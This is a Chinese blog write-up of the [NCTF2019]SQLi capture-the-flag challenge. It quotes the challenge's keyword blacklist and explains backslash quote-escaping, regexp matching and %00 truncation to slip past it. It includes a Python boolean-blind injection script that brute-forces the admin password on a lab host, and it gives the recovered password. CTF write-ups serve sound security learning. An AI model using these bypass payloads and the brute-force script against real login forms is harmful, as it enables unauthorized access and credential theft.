[NCTF2019]SQLi

最新推荐文章于 2024-09-27 13:44:47 发布
最新推荐文章于 2024-09-27 13:44:47 发布
阅读量432 收藏
点赞数
分类专栏: BUUCTF 文章标签: sql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yb_140/article/details/128108965
版权

SQL注入 Web安全 WAF绕过 密码破解 安全防护
关键词由CSDN通过智能技术生成

进来就有个弹窗

甚至给了sql语句

sqlquery : select * from users where username='' and passwd=''

先扫一下目录,发现有个robots.txt

提示有个hint.txt

$black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table|concat|insert|join|having|sleep/i";


If $_POST['passwd'] === admin's password,

Then you will get the flag;

看到有黑名单,拿到admin的密码就可以获得flag

知识点:

  • ;%00代替注释符/00截断
  • 转义符“\”没被过滤,可以转义符转义username处的单引号,我们提交的用户名就变成了 ’ and passwd=

select * from users where username='' and passwd='' #登录框处查询语句

username=\&passwd=||(passwd/**/regexp/**/"^y");%00   #用户名输入\,密码输入“或”符号加括号、内联绕waf,及结尾截断。

sqlquery : select * from users where username='\' and passwd='||/**/passwd/**/regexp/**/"^y";

相等于select * from users where (passwd/**/regexp/**/"^y");

脚本:

#coding:utf-8
import requests
import string
import time
url = "http://d0c2931b-a28b-4380-9b1b-f63b2d3c408d.node4.buuoj.cn:81/"

password = ""

string = '_' + string.ascii_lowercase + string.digits
for i in range(1,50):
    print(i)
    for j in string:
        data1 = {
            'username':'\\',
            'passwd':'||passwd/**/regexp/**/"^{}";\x00'.format(password+j)
        }
        print(data1)
        res = requests.post(url = url , data = data1)
        if r"welcome.php" in res.text:
            password+=j
            print(password)
            break
        elif res.status_code == 429:
            time.sleep(0.5)

得到密码为:you_will_never_know7788990

得到flag,注意这里的username如果是admin的会被waf拦截

超级兵_140
关注
专栏目录
buu-[NCTF2019]SQLi
qaq517384的博客
10-14 225
打开界面是一个有sql语句的登录框 老本行robots.txt发现有提示 $black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table|concat|insert|join|having|sleep/i"; If $_POST['
[NCTF2019]SQLi 1&regexp注入
plant1234的博客
10-03 1357
发现为ture时返回Location: welcome.php。随便输入一个用户,用admin的密码登陆得到flag。并且当密码和admin密码相同时就能得到flag。可以利用bool盲注进行注入,爆破passwd。发现没有过滤 " 和 \。
[NCTF2019]SQLi 1 详解 以及 regexp 布尔盲注爆破脚本深度解析与改进
最新发布
weixin_47623063的博客
09-27 750
regxp bool注入;dirmap目录扫描;bool盲注爆破脚本;[NCTF2019]SQLi 1
BUUCTF:[NCTF2019]SQLi --sql正则注入 ---- regexp注入 --- sql 闭合的新的骚操作 --PHP版本的%00截断
Zero_Adam的博客
03-15 1100
目录:一、自己做,二、学到的:三、学习WP:1.盲注, 这个讲正则注入原理比较细致,有mysql的本地实验 这个有一道例题 一、自己做, fuzzing了,但是没有思路, 给我这么一句话:try to make the sqlquery have its own results. 后来发现没用, 二、学到的: mysql正则注入 regex 一个新的sql闭合方式,妈呀,骚的很,至少对于我这个菜鸡才说是开了眼界了,,,牛你牛后面看看 sql注入时,当注释符和单引号都被过滤了的时候,我们不能够闭合语句了,
[NCTF2019]SQLi——regexp注入
qi_SJQ_的博客
11-15 3133
打开题目,很明显的sql注入,甚至连sql注入语句是字符型都贴了出来,写的那么明目张胆,很显然waf过滤的很多,很变态: 嗯,fuzzing一下,果然基本会的都过滤了(doge),抱着试试的心态扫了下目录,发现robots.txt提示有hint.txt: 不会…,看看wp1和wp2 ...
[NCTF2019]SQLi(Regexp注入)
D.MIND 的博客
04-25 860
文章目录分析Regexp注入盲注脚本总结: 又是一道考验写python脚本的题目,python学的真不咋地,看师傅们的脚本才知道一些点改怎么写… 分析 查询语句: sqlquery : select * from users where username='' and passwd='' 一开始真的尝试很多感觉不好绕,后来意识到前面username处可以用反斜杠将SQL语句的单引号转义,再之后就没头绪了,因为实在过滤了很多,之后尝试了看看有没有hint信息,在robots.txt处找到,提示看hint.
刷题记录-[NCTF2019]SQLi
weixin_43610673的博客
05-09 2204
测试一下 应该是or被拦截了 简单fuzz一下 可以看到regexp是可以用的 题目也直接给了被过滤的关键词 找到admin的密码即可得flag 由于单引号被禁用,使用 \ 转义and前面的那个单引号,使得 '\' and passwd=' 形成闭合 构造passwd处为 ||/**/passwd/**/regexp/**/"^a";%00 用regexp查询passwd ^匹配字符串开头 %00截断后面的内容 但是不能在输入框直接提交,会被url encode 变为%2500被黑名单拦截.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值